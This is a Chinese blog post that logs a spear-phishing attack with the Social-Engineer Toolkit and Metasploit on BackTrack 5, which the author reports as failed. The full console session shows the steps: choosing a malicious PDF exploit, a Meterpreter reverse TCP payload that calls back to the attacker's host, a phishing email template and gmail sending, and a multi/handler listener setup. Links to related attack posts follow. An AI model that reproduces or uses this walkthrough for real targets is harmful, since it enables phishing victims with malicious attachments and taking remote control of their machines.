metasploit针对性钓鱼攻击向量(BT5R1失败)
来源:互联网 发布:云计算 中国科学院 编辑:程序博客网 时间:2024/04/29 19:17
root@root:~# cd /pentest/exploits/set/root@root:/pentest/exploits/set# ./set :::=== :::===== :::==== ::: ::: :::==== ===== ====== === === === === ====== ======== === [---] The Social-Engineer Toolkit (SET) [---] [---] Created by: David Kennedy (ReL1K) [---] [---] Development Team: Thomas Werth [---] [---] Development Team: JR DePre (pr1me) [---] [---] Development Team: Joey Furr (j0fer) [---] [---] Version: 2.0.3 [---] [---] Codename: 'Trebuchet Edition' [---] [---] Report bugs to: davek@secmaniac.com [---] [---] Follow me on Twitter: dave_rel1k [---] [---] Homepage: http://www.secmaniac.com [---] Welcome to the Social-Engineer Toolkit (SET). Your one stop shop for all of your social-engineering needs.. DerbyCon 2011 Sep30-Oct02 - http://www.derbycon.com. Join us on irc.freenode.net in channel #setoolkit Select from the menu: 1) Spear-Phishing Attack Vectors 2) Website Attack Vectors 3) Infectious Media Generator 4) Create a Payload and Listener 5) Mass Mailer Attack 6) Arduino-Based Attack Vector 7) SMS Spoofing Attack Vector 8) Wireless Access Point Attack Vector 9) Third Party Modules 10) Update the Metasploit Framework 11) Update the Social-Engineer Toolkit 12) Help, Credits, and About 99) Exit the Social-Engineer Toolkitset > 1 The Spearphishing module allows you to specially craft email messages and send them to a large (or small) number of people with attached fileformat malicious payloads. If you want to spoof your email address, be sure "Sendmail" is in- stalled (it is installed in BT4) and change the config/set_config SENDMAIL=OFF flag to SENDMAIL=ON. There are two options, one is getting your feet wet and letting SET do everything for you (option 1), the second is to create your own FileFormat payload and use it in your own attack. Either way, good luck and enjoy! 1) Perform a Mass Email Attack 2) Create a FileFormat Payload 3) Create a Social-Engineering Template 99) Return to Main Menuset:phishing > 1 Select the file format exploit you want. The default is the PDF embedded EXE. ********** PAYLOADS ********** 1) SET Custom Written DLL Hijacking Attack Vector (RAR, ZIP) 2) SET Custom Written Document UNC LM SMB Capture Attack 3) Microsoft Windows CreateSizedDIBSECTION Stack Buffer Overflow 4) Microsoft Word RTF pFragments Stack Buffer Overflow (MS10-087) 5) Adobe Flash Player "Button" Remote Code Execution 6) Adobe CoolType SING Table "uniqueName" Overflow 7) Adobe Flash Player "newfunction" Invalid Pointer Use 8) Adobe Collab.collectEmailInfo Buffer Overflow 9) Adobe Collab.getIcon Buffer Overflow 10) Adobe JBIG2Decode Memory Corruption Exploit 11) Adobe PDF Embedded EXE Social Engineering 12) Adobe util.printf() Buffer Overflow 13) Custom EXE to VBA (sent via RAR) (RAR required) 14) Adobe U3D CLODProgressiveMeshDeclaration Array Overrun 15) Adobe PDF Embedded EXE Social Engineering (NOJS) 16) Foxit PDF Reader v4.1.1 Title Stack Buffer Overflow 17) Nuance PDF Reader v6.0 Launch Stack Buffer Overflowset:payloads > 8 1) Windows Reverse TCP Shell Spawn a command shell on victim and send back to attacker 2) Windows Meterpreter Reverse_TCP Spawn a meterpreter shell on victim and send back to attacker 3) Windows Reverse VNC DLL Spawn a VNC server on victim and send back to attacker 4) Windows Reverse TCP Shell (x64) Windows X64 Command Shell, Reverse TCP Inline 5) Windows Meterpreter Reverse_TCP (X64) Connect back to the attacker (Windows x64), Meterpreter 6) Windows Shell Bind_TCP (X64) Execute payload and create an accepting port on remote system 7) Windows Meterpreter Reverse HTTPS Tunnel communication over HTTP using SSL and use Meterpreterset:payloads > 2set:payloads > Port to connect back on [443]: [-] Defaulting to port 443...[-] Generating fileformat exploit...[*] Payload creation complete.[*] All payloads get sent to the src/program_junk/src/program_junk/template.pdf directory[-] As an added bonus, use the file-format creator in SET to create your attachment. Right now the attachment will be imported with filename of 'template.whatever' Do you want to rename the file? example Enter the new filename: moo.pdf 1. Keep the filename, I don't care. 2. Rename the file, I want to be cool.set:phishing > 1[*] Keeping the filename and moving on. Social Engineer Toolkit Mass E-Mailer There are two options on the mass e-mailer, the first would be to send an email to one individual person. The second option will allow you to import a list and send it to as many people as you want within that list. What do you want to do: 1. E-Mail Attack Single Email Address 2. E-Mail Attack Mass Mailer 99. Return to main menu. set:phishing > 1 Do you want to use a predefined template or craft a one time email template. 1. Pre-Defined Template 2. One-Time Use Email Templateset:phishing > 1[-] Available templates:1: WOAAAA!!!!!!!!!! This is crazy...2: How long has it been?3: Have you seen this?4: Baby Pics5: Dan Brown's Angels & Demons6: New Update7: Computer Issue8: Status Report9: Strange internet usage from your computerset:phishing > 8set:phishing > Send email to: feier7501@126.com 1. Use a gmail Account for your email attack. 2. Use your own server or open relayset:phishing > 1set:phishing > Your gmail email address: : feier7501@gmail.comEmail password: set:phishing >
set:phishing > Flag this message/s as high priority? [yes|no]: no[*] SET has finished delivering the emailsset:phishing > Setup a listener [yes|no]: Unhandled exception in thread started by
我输入yes:
yes[-] ***[-] * WARNING: Database support has been disabled[-] ***Unable to handle kernel NULL pointer dereference at virtual address 0xd34db33fEFLAGS: 00010046eax: 00000001 ebx: f77c8c00 ecx: 00000000 edx: f77f0001esi: 803bf014 edi: 8023c755 ebp: 80237f84 esp: 80237f60ds: 0018 es: 0018 ss: 0018Process Swapper (Pid: 0, process nr: 0, stackpage=80377000)Stack: 90909090990909090990909090 90909090990909090990909090 90909090.90909090.90909090 90909090.90909090.90909090 90909090.90909090.09090900 90909090.90909090.09090900 .......................... cccccccccccccccccccccccccc cccccccccccccccccccccccccc ccccccccc................. cccccccccccccccccccccccccc cccccccccccccccccccccccccc .................ccccccccc cccccccccccccccccccccccccc cccccccccccccccccccccccccc .......................... ffffffffffffffffffffffffff ffffffff.................. ffffffffffffffffffffffffff ffffffff.................. ffffffff.................. ffffffff..................Code: 00 00 00 00 M3 T4 SP L0 1T FR 4M 3W OR K! V3 R5 I0 N4 00 00 00 00Aiee, Killing Interrupt handlerKernel panic: Attempted to kill the idle task!In swapper task - not syncing =[ metasploit v4.0.0-release [core:4.0 api:1.0]+ -- --=[ 716 exploits - 361 auxiliary - 68 post+ -- --=[ 226 payloads - 27 encoders - 8 nops =[ svn r13462 updated 652 days ago (2011.08.01)Warning: This copy of the Metasploit Framework was last updated 652 days ago. We recommend that you update the framework at least every other day. For information on updating your copy of Metasploit, please see: https://community.rapid7.com/docs/DOC-1306resource (src/program_junk/meta_config)> use exploit/multi/handlerresource (src/program_junk/meta_config)> set PAYLOAD windows/meterpreter/reverse_tcpPAYLOAD => windows/meterpreter/reverse_tcpresource (src/program_junk/meta_config)> set LHOST 192.168.1.11LHOST => 192.168.1.11resource (src/program_junk/meta_config)> set LPORT 443LPORT => 443resource (src/program_junk/meta_config)> set ENCODING shikata_ga_naiENCODING => shikata_ga_nairesource (src/program_junk/meta_config)> set ExitOnSession falseExitOnSession => falseresource (src/program_junk/meta_config)> exploit -j[*] Exploit running as background job.msf exploit(handler) > [*] Started reverse handler on 192.168.1.11:443 [*] Starting the payload handler...
上面抛异常了,而且,我的126的邮箱也没有收到邮件。
版本BT5R1,换个版本试试。
- metasploit针对性钓鱼攻击向量(BT5R1失败)
- metasploit针对性钓鱼攻击向量(BT5R3失败)
- metasploit针对性钓鱼攻击向量入侵成功
- metasploit文件格式漏洞渗透攻击(失败)
- metasploit的WEB攻击向量
- 钓鱼攻击
- Metasploit 攻击
- Metasploit入门用法(主动攻击)
- 网络钓鱼攻击
- metasploit 自动攻击
- Metasploit 攻击winXP
- 【公益译文】网络钓鱼风险(攻击带来的损失)
- metasploit文件格式漏洞渗透攻击(成功生成doc)
- metasploit文件格式漏洞渗透攻击(成功获得shell)
- 网络钓鱼(Phishing)攻击方式
- Metasploit连接数据库失败
- 预防社会工程学攻击及钓鱼攻击
- 网络钓鱼攻击使用HTTPS攻击受害者
- 基本文件IO的实现
- 第十三周项目四——Date类,Time类,多继承的DateTime类
- svn在windows下的搭建
- poj-3159,SPFA+堆栈
- WP8调用WebService或WCF时遇到的问题及解决方案
- metasploit针对性钓鱼攻击向量(BT5R1失败)
- Windows Phone(WP)从此开始!
- GWT 实现文件上传和下载
- USTCACM1385 最小公倍数
- inux文件压缩包管理-tar
- hdu 1524 A Chess Game
- Java论坛汇总
- C风格的字符串
- 滚动条样式